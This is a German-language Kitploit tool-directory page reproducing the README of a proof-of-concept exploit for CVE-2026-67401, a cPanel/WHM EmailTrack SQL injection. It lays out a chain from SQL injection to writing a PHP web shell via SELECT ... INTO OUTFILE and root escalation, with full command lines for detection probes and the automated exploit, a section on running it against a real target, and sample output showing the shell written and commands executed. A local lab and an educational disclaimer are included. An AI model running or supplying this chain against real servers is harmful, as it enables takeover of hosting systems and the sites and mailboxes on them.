Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-67401 — Proof-of-Concept für CVE-2026-67401, eine cPanel/WHM EmailTrack SQL-Injection, die beliebiges Dateischreiben und Root-RCE ermöglicht, mit SQLi-Erkennungssonden und einem in sich geschlossenen verwundbaren Lab. | Kitploit
Tools/GitHubGitHub/imbas007/cve-2026-67401
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & BildungLabs & Praxis
GitHubimbas007/cve-2026-67401

CVE-2026-67401

Proof-of-Concept für CVE-2026-67401, eine cPanel/WHM EmailTrack SQL-Injection, die beliebiges Dateischreiben und Root-RCE ermöglicht, mit SQLi-Erkennungssonden und einem in sich geschlossenen verwundbaren Lab.

vor 3h 58mNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-67401 — cPanel/WHM EmailTrack SQL-Injection → Root-RCE

CVE Severity Platform Python

Proof-of-Concept für CVE-2026-67401, eine kritische SQL-Injection-Schwachstelle in der EmailTrack-Funktionalität von cPanel & WHM, die es einem authentifizierten Benutzer mit mailbezogenen Berechtigungen ermöglicht, beliebige Dateien zu schreiben und Code als root auszuführen.

Entdeckt von: Ali Mustafa Veröffentlicht: 8. September 2026 Komponente: EmailTrack (E-Mail-Zustellungsprotokollierung / -Tracking)


Betroffene Versionen

Versionen unterhalb der korrigierten Builds sind anfällig.

cPanel-Build-SerieKorrigierte Version
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

Überprüfen Sie Ihre Version mit:

root@kitploit:~
cat /usr/local/cpanel/version

Exploit-Kette

root@kitploit:~
┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. Authentifizieren Sie sich bei cPanel mit einem Konto, das Mail-Berechtigungen besitzt.
  2. Injizieren Sie über den EmailTrack-Parameter account.
  3. Schreiben Sie eine PHP-Webshell mit SELECT ... INTO OUTFILE in public_html/.
  4. Führen Sie Befehle über die Shell aus.
  5. Eskalieren Sie über cPanel-SUID-Binärdateien, Cron oder die Task-Queue.

Repository-Inhalt

DateiBeschreibung
poc_sqli.pySQL-Injection-Erkennung: boolean-basiert, zeitbasiert und UNION-Spaltenanzahl
poc_full_chain.pyVollständige Exploit-Kette: SQLi → INTO OUTFILE-Webshell → RCE → Root-Anleitung
lab/vuln_server.pyLokale Simulation des anfälligen EmailTrack-Backends (sicher, eigenständig)
README.mdDieses Dokument

Das mitgelieferte Lab ermöglicht es Ihnen, die gesamte Kette ohne einen echten cPanel-Server auszuführen und zu validieren.


Anforderungen

  • Python 3.8+
  • Keine Drittanbieter-Pakete — alles verwendet die Standardbibliothek.

Verwendung

Alle Befehle werden vom Repository-Stammverzeichnis aus ausgeführt.

1. Lokales Lab ausführen

root@kitploit:~
python3 lab/vuln_server.py 18123 lab/htdocs
  • Anmeldedaten: alice / s3cr1t
  • Emuliert: UAPI-Login, die anfällige EmailTrack-Abfrage, SLEEP(), INTO OUTFILE und PHP-Webshell-Ausführung.
  • Argument 1: Port (Standard 18123)
  • Argument 2: Document Root (Standard lab/htdocs)

Lassen Sie dies in einem Terminal laufen und verwenden Sie ein zweites Terminal für die PoCs.

2. SQL-Injection-Erkennung

root@kitploit:~
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
ArgumentBeschreibung
-H, --hostcPanel-Host, z. B. https://cp.example.com:2083
-u, --usernamecPanel-Konto mit Mail-Berechtigungen
-p, --passwordKontopasswort
--paramInjizierbarer Parameter (Standard: account)
--modedetect (Standard), boolean, timing, union oder all
--sleepSLEEP()-Dauer für die Timing-Sonde (Standard: 3.0)
--dump-versionVersuch, die DBMS-Version über UNION zu extrahieren
--insecureTLS-Zertifikatsüberprüfung überspringen

Eine bestimmte Sonde ausführen:

root@kitploit:~
# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. Vollständige Exploit-Kette

root@kitploit:~
CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
Argument / EnvBeschreibung
host (positional)cPanel-Host oder Umgebungsvariable CPANEL_HOST setzen
CPANEL_USERcPanel-Konto mit Mail-Berechtigungen
CPANEL_PASSKontopasswort
--shell-baseBasis-URL, die public_html bereitstellt (wo die Webshell erreichbar ist)
--insecureTLS-Zertifikatsüberprüfung überspringen
--no-escalateNach RCE stoppen; Root-Eskalationsanleitung überspringen
SHELL_NAME (env)Dateiname der Webshell (Standard: .mail.cache.php)

Automatisch ausgeführte Phasen:

  1. Bei cPanel authentifizieren
  2. SQL-Injection bestätigen (boolean + zeitbasiert)
  3. Spaltenanzahl der Abfrage über UNION bestimmen
  4. Eine PHP-Webshell mit SELECT ... INTO OUTFILE schreiben
  5. Befehle über die Shell ausführen (id, whoami, SUID-Aufzählung, …)
  6. Root-Eskalationsanleitung ausgeben (SUID whmapi1, Cron, Task-Queue)

4. Gegen ein echtes Ziel

root@kitploit:~
# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

Hinweis: Der Standardwert für --shell-base entfernt den cPanel-spezifischen Port (2082/2083) aus dem Host. Wenn das Document Root auf einem anderen Port bereitgestellt wird, legen Sie ihn explizit fest.


Verifizierte Ergebnisse

Ausgabe, die gegen das mitgelieferte Lab erzeugt wurde:

root@kitploit:~
  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

Referenzen

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

Lizenz

Veröffentlicht für Bildungs- und autorisierte Sicherheitsforschungszwecke. Siehe Haftungsausschluss vor der Verwendung.

Tool herunterladen